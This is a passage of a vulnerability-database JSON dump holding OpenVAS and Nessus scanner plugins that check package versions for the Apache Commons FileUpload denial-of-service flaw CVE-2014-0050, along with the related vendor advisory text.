script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload\", rpm:\"jakarta-commons-fileupload~1.1.1~1.37.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload-javadoc\", rpm:\"jakarta-commons-fileupload-javadoc~1.1.1~1.37.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867519", "href": "http://plugins.openvas.org/nasl.php?oid=867519", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867519);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2183\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867519", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867519\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2019-03-19T00:00:00", "published": "2014-02-07T00:00:00", "id": "OPENVAS:1361412562310702856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702856\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2856.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"libcommons-fileupload-java on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867523\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2175\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050", "CVE-2014-6483"], "description": "This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.", "modified": "2018-10-24T00:00:00", "published": "2016-01-25T00:00:00", "id": "OPENVAS:1361412562310807039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807039", "type": "openvas", "title": "Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_db_mult_unspecified_vuln07_jan16.nasl 12047 2018-10-24 07:38:41Z cfischer $\n#\n# Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:oracle:database_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807039\");\n script_version(\"$Revision: 12047 $\");\n script_cve_id(\"CVE-2014-6483\", \"CVE-2014-0050\");\n script_bugtraq_id(65400, 70480);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 09:38:41 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 14:59:25 +0530 (Mon, 25 Jan 2016)\");\n script_name(\"Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple\n unspecified vulnerabilities in the Application Express component.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploitation will allow remote\n authenticated attackers to affect confidentiality, integrity, and availability\n via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle Database Server version\n before 4.2.6\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"oracle_tnslsnr_version.nasl\");\n script_mandatory_keys(\"OracleDatabaseServer/installed\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!dbPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dbVer = get_app_version(cpe:CPE, port:dbPort)){\n exit(0);\n}\n\nif(version_is_less(version:dbVer, test_version:\"4.2.6\"))\n{\n report = report_fixed_ver(installed_version:dbVer, fixed_version:\"Apply the appropriate patch\");\n security_message(data:report, port:dbPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.", "edition": 26, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78670);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Build\");\n if (int(build) < 1992027)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1992027' + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Orchestrator Appliance', verui);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:14:08", "description": "Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages\nthat fix one security issue are now available for Red Hat Enterprise\nLinux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons\nFileUpload, which is embedded in the JBoss Web component of JBoss EAP,\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat\nJBoss Enterprise Application Platform installation and deployed\napplications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on\nRed Hat Enterprise Linux 5 and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.", "edition": 26, "published": "2014-03-06T00:00:00", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:jbossweb"], "id": "REDHAT-RHSA-2014-0253.NASL", "href": "https://www.tenable.com/plugins/nessus/72853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0253. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72853);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"RHSA\", value:\"2014:0253\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages\nthat fix one security issue are now available for Red Hat Enterprise\nLinux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons\nFileUpload, which is embedded in the JBoss Web component of JBoss EAP,\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat\nJBoss Enterprise Application Platform installation and deployed\napplications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on\nRed Hat Enterprise Linux 5 and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0050\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jbossweb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red 